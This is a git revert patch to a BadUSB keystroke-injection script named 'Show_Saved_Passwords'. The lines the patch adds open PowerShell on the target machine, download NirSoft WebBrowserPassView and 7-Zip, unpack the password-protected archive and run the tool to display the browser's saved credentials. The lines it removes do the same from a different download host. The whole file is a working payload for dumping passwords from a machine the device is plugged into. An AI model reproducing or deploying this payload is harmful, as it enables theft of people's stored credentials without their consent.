From a271e398c4c051473b60566faa465c1591f1d1c1 Mon Sep 17 00:00:00 2001 From: jbohack Date: Fri, 24 Feb 2023 16:03:59 -0500 Subject: [PATCH] Revert "Fixed an error with expanding the archive." This reverts commit dae2dd1b7bfcec20a6216790a94a2e152f414381. --- BadUSB/Show_Saved_Passwords.txt | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/BadUSB/Show_Saved_Passwords.txt b/BadUSB/Show_Saved_Passwords.txt index 43b8fcb5..1b0dc507 100644 --- a/BadUSB/Show_Saved_Passwords.txt +++ b/BadUSB/Show_Saved_Passwords.txt @@ -3,12 +3,10 @@ DELAY 1000 STRING powershell ENTER DELAY 1000 +STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip ENTER -DELAY 1000 -STRING rmdir -R \temp -ENTER -DELAY 1000 -STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip +DELAY 5000 +STRING wbpv28821@ ENTER STRING .\WebBrowserPassView.exe ENTER @@ -33,4 +31,4 @@ ENTER STRING rmdir -R \temp ENTER STRING EXIT -ENTER +ENTER \ No newline at end of file